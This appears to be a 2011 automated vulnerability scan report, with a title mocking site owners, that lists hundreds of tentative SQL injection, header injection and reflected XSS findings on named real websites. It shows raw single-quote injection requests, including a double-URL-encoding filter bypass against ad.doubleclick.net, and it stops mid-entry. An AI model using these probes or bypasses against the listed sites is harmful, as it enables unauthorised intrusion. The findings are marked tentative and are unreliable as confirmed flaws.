Google DORK, GHDB, Fools, Inept, No experience Necessary

Reflected XSS, Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, Vulnerable Hosts, Fools

Report generated by XSS.CX at Fri Apr 22 23:36:39 CDT 2011.


Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.



1. SQL injection

1.1. http://ad.doubleclick.net/adj/wn.nat.kwtv/sales-environmental [REST URL parameter 3]

1.2. http://ad.doubleclick.net/adj/wn.nat.kwtv/weather [id cookie]

1.3. http://www.skymall.com/shopping/cart.htm [hiddenlong parameter]

1.4. http://www.skymall.com/shopping/cart.htm [pid parameter]

1.5. http://www.skymall.com/shopping/cart.htm [sbs parameter]

1.6. http://www.skymall.com/shopping/dept.htm [CoreID6 cookie]

1.7. http://www.skymall.com/shopping/dept.htm [TXNSESSION cookie]

1.8. http://www.skymall.com/shopping/dept.htm [User-Agent HTTP header]

1.9. http://www.skymall.com/shopping/dept.htm [__utmb cookie]

1.10. http://www.skymall.com/shopping/dept.htm [__utmc cookie]

1.11. http://www.skymall.com/shopping/dept.htm [__utmz cookie]

1.12. http://www.skymall.com/shopping/dept.htm [cmRS cookie]

1.13. http://www.skymall.com/shopping/dept.htm [source cookie]

1.14. http://www.skymall.com/shopping/detail.htm [__utmc cookie]

1.15. http://www.skymall.com/shopping/subdept.htm [90043274_clogin cookie]

1.16. http://www.skymall.com/shopping/subdept.htm [Referer HTTP header]

1.17. http://www.skymall.com/shopping/subdept.htm [partner cookie]

2. HTTP header injection

2.1. http://ad.doubleclick.net/ad/x1.aud/salesforce/customcloud/lp [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.10 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.9 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adj/wn.loc.kwtv/business [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adj/wn.loc.kwtv/education [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adj/wn.loc.kwtv/foodrecipe [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adj/wn.loc.kwtv/health [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adj/wn.loc.kwtv/homepage [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adj/wn.loc.kwtv/news [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adj/wn.loc.kwtv/radio01 [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adj/wn.loc.kwtv/radio07 [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adj/wn.loc.kwtv/sales-environmental [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adj/wn.loc.kwtv/sales-worldnow22 [REST URL parameter 1]

2.14. http://ad.doubleclick.net/adj/wn.loc.kwtv/station15 [REST URL parameter 1]

2.15. http://ad.doubleclick.net/adj/wn.loc.kwtv/station5 [REST URL parameter 1]

2.16. http://ad.doubleclick.net/adj/wn.loc.kwtv/station9 [REST URL parameter 1]

2.17. http://ad.doubleclick.net/adj/wn.nat.kwtv/news [REST URL parameter 1]

2.18. http://ad.doubleclick.net/adj/wn.nat.kwtv/radio07 [REST URL parameter 1]

2.19. http://ad.doubleclick.net/adj/wn.nat.kwtv/sales-environmental [REST URL parameter 1]

2.20. http://ad.doubleclick.net/adj/wn.nat.kwtv/station2 [REST URL parameter 1]

2.21. http://ad.doubleclick.net/adj/wn.nat.kwtv/weather [REST URL parameter 1]

2.22. http://www.salesforce.com/common/assets/css/styles.css [REST URL parameter 4]

2.23. http://www.salesforce.com/common/assets/css/superfish.css [REST URL parameter 4]

2.24. http://www.salesforce.com/common/assets/js/global2.js [REST URL parameter 4]

2.25. http://www.salesforce.com/common/assets/js/opinionlab/oo_engine.js [REST URL parameter 5]

2.26. http://www.salesforce.com/common/assets/js/sf.js [REST URL parameter 4]

2.27. http://www.salesforce.com/common/assets/js/supersubs.js [REST URL parameter 4]

2.28. http://www.salesforce.com/common/assets/thirdparty/foresee/foresee-surveydef.js [REST URL parameter 5]

2.29. http://www.salesforce.com/common/assets/thirdparty/foresee/transport5.swf [REST URL parameter 5]

2.30. http://www.salesforce.com/common/assets/thirdparty/omniture/s_code3.js [REST URL parameter 5]

2.31. http://www.salesforce.com/common/assets/thirdparty/pixels/pixel-manager.js [REST URL parameter 5]

2.32. http://www.salesforce.com/favicon.ico [REST URL parameter 1]

2.33. http://www.salesforce.com/platform [REST URL parameter 1]

2.34. http://www.salesforce.com/platform/210x147_rotatingbanner.swf [REST URL parameter 2]

2.35. http://www.salesforce.com/platform/data/banner_rotation.xml [REST URL parameter 3]

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.10 [sz parameter]

3.2. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

3.3. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 1]

3.4. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 2]

3.5. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 3]

3.6. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 4]

3.7. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 5]

3.8. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 6]

3.9. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 7]

3.10. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [name of an arbitrarily supplied request parameter]

3.11. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [target parameter]

3.12. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [target parameter]

3.13. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 1]

3.14. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 2]

3.15. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 3]

3.16. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 4]

3.17. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 5]

3.18. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 6]

3.19. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 7]

3.20. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [name of an arbitrarily supplied request parameter]

3.21. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [target parameter]

3.22. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [target parameter]

3.23. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.24. http://jobs.ctg.eu/N [REST URL parameter 1]

3.25. http://jobs.ctg.eu/jobs/ [REST URL parameter 1]

3.26. http://jobs.ctg.eu/misc/drupal.js [REST URL parameter 1]

3.27. http://jobs.ctg.eu/misc/drupal.js [REST URL parameter 2]

3.28. http://jobs.ctg.eu/misc/jquery.js [REST URL parameter 1]

3.29. http://jobs.ctg.eu/misc/jquery.js [REST URL parameter 2]

3.30. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 1]

3.31. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 2]

3.32. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 3]

3.33. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 1]

3.34. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 2]

3.35. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 3]

3.36. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 1]

3.37. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 2]

3.38. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 3]

3.39. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 1]

3.40. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 2]

3.41. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 3]

3.42. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 1]

3.43. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 2]

3.44. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 3]

3.45. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 1]

3.46. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 2]

3.47. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 3]

3.48. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 4]

3.49. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 5]

3.50. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 5]

3.51. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]

3.52. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 2]

3.53. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 3]

3.54. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 4]

3.55. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 5]

3.56. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]

3.57. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]

3.58. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]

3.59. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]

3.60. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 3]

3.61. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 4]

3.62. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 5]

3.63. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]

3.64. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 1]

3.65. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 2]

3.66. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 3]

3.67. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 4]

3.68. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 5]

3.69. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 1]

3.70. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 2]

3.71. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 3]

3.72. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 4]

3.73. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 5]

3.74. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 1]

3.75. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 2]

3.76. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 3]

3.77. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 4]

3.78. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 5]

3.79. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 6]

3.80. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 1]

3.81. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 2]

3.82. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 3]

3.83. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 4]

3.84. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 5]

3.85. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 6]

3.86. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 1]

3.87. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 2]

3.88. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 3]

3.89. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 4]

3.90. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 5]

3.91. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 6]

3.92. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 1]

3.93. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 2]

3.94. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 3]

3.95. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 3]

3.96. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 4]

3.97. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 4]

3.98. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 5]

3.99. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 1]

3.100. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 2]

3.101. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 3]

3.102. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 4]

3.103. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 5]

3.104. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 6]

3.105. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 1]

3.106. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 2]

3.107. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 3]

3.108. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 4]

3.109. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 5]

3.110. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 6]

3.111. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 1]

3.112. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 2]

3.113. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 3]

3.114. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 4]

3.115. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 5]

3.116. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 6]

3.117. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 1]

3.118. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 2]

3.119. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 3]

3.120. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 4]

3.121. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 5]

3.122. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 6]

3.123. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 1]

3.124. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 2]

3.125. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 3]

3.126. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 4]

3.127. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 5]

3.128. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 6]

3.129. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 1]

3.130. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 2]

3.131. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 3]

3.132. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 4]

3.133. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 4]

3.134. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 5]

3.135. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 6]

3.136. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 1]

3.137. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 2]

3.138. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 3]

3.139. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 4]

3.140. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 4]

3.141. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 5]

3.142. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 5]

3.143. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 6]

3.144. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 1]

3.145. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 2]

3.146. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 3]

3.147. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 4]

3.148. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 5]

3.149. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 6]

3.150. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 1]

3.151. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 2]

3.152. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 3]

3.153. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 4]

3.154. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 5]

3.155. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 6]

3.156. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 1]

3.157. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 2]

3.158. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 3]

3.159. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 4]

3.160. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 5]

3.161. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 1]

3.162. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 2]

3.163. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 3]

3.164. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 4]

3.165. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 5]

3.166. http://jobs.ctg.eu/we-promise [REST URL parameter 1]

3.167. http://js.revsci.net/gateway/gw.js [csid parameter]

3.168. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 1]

3.169. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 3]

3.170. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 7]

3.171. https://secure.ubi.com/register/CreateAccount.aspx [NextURL parameter]

3.172. http://widgets.digg.com/buttons/count [url parameter]

3.173. http://www.dmvnow.com/favicon.ico [REST URL parameter 1]

3.174. http://www.salsalabs.com/o/8001/p/salsa/website/labs/ [REST URL parameter 1]

3.175. http://www.salsalabs.com/o/8001/p/salsa/website/labs/ [REST URL parameter 3]

3.176. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 1]

3.177. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 3]

3.178. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 8]

3.179. https://www.salsalabs.com/dia/hq/css/custom.css [REST URL parameter 1]

3.180. https://www.salsalabs.com/dia/hq/sso/ [REST URL parameter 1]

3.181. https://www.salsalabs.com/favicon.ico [REST URL parameter 1]

3.182. http://www.skymall.com/shopping/dept.htm [c parameter]

3.183. http://www.skymall.com/shopping/subdept.htm [c parameter]

3.184. http://www.swiftpage1.com/favicon.ico [REST URL parameter 1]

3.185. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.186. http://www.ubi.com/resources/scripts/sifr_init_js.aspx [path parameter]

3.187. http://www.ubi.com/resources/ubi_stylesheet_png.aspx [path parameter]

3.188. http://www.blacksingles.com/favicon.ico [Referer HTTP header]

3.189. http://www.palomar.edu/favicon.ico [Referer HTTP header]

3.190. http://www.palomar.edu/favicon.ico [User-Agent HTTP header]

3.191. https://www.salsalabs.com/dia/hq/css/custom.css [Referer HTTP header]

3.192. https://www.salsalabs.com/dia/hq/css/custom.css [Referer HTTP header]

3.193. https://www.salsalabs.com/favicon.ico [Referer HTTP header]

3.194. https://www.salsalabs.com/favicon.ico [Referer HTTP header]

3.195. http://www.wiredforchange.com/favicon.ico [Referer HTTP header]

3.196. http://www.wiredforchange.com/favicon.ico [Referer HTTP header]

3.197. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.198. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.199. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

3.200. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

3.201. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.202. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]



1. SQL injection
There are 17 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs that you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights from occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/wn.nat.kwtv/sales-environmental [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/sales-environmental

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adj/wn.nat.kwtv/sales-environmental';sz=300x75;wnsz=44;tile=1;wncc=Sales%20-%20Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50062;apptype=platform;env=production;ord=51921513? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 22 Apr 2011 16:06:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4618

document.write(' \n<!-- Styles -->\n<style type=\"text/css\"> \ntable.main {\n \n    background: url(\'http://images.worldnow.com/Revenue/images/235258_G.jpg\');\n    \n    border-width: 1px;\n    border-spacing:
...[SNIP]...
<a href=\"/global/Story.asp?s=14491037\" updatelink=\"true\" trackclick=\"dfp\" style=\"color:#000000; font-size: 10px; \">Amazon failure crashes web </a>
...[SNIP]...

Request 2

GET /adj/wn.nat.kwtv/sales-environmental'';sz=300x75;wnsz=44;tile=1;wncc=Sales%20-%20Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50062;apptype=platform;env=production;ord=51921513? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 22 Apr 2011 16:06:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4580

document.write(' \n<!-- Styles -->\n<style type=\"text/css\"> \ntable.main {\n \n    background: url(\'http://images.worldnow.com/Revenue/images/235258_G.jpg\');\n    \n    border-width: 1px;\n    border-spacing:
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/wn.nat.kwtv/weather [id cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/weather

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the id cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/wn.nat.kwtv/weather;sz=300x75;wnsz=44;tile=1;wncc=Weather;wnpt=C;wnpc=weather;wncp=KWTV;wncid=198140;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50085;apptype=platform;env=production;ord=37923550? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y%2527

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 22 Apr 2011 16:06:45 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 22 Apr 2011 15:51:45 GMT
Expires: Fri, 22 Apr 2011 15:51:45 GMT
Cache-Control: private
Content-Length: 4618

document.write(' \n<!-- Styles -->\n<style type=\"text/css\"> \ntable.main {\n \n    background: url(\'http://images.worldnow.com/Revenue/images/235258_G.jpg\');\n    \n    border-width: 1px;\n    border-spacing:
...[SNIP]...
<a href=\"/global/Story.asp?s=14491037\" updatelink=\"true\" trackclick=\"dfp\" style=\"color:#000000; font-size: 10px; \">Amazon failure crashes web </a>
...[SNIP]...

Request 2

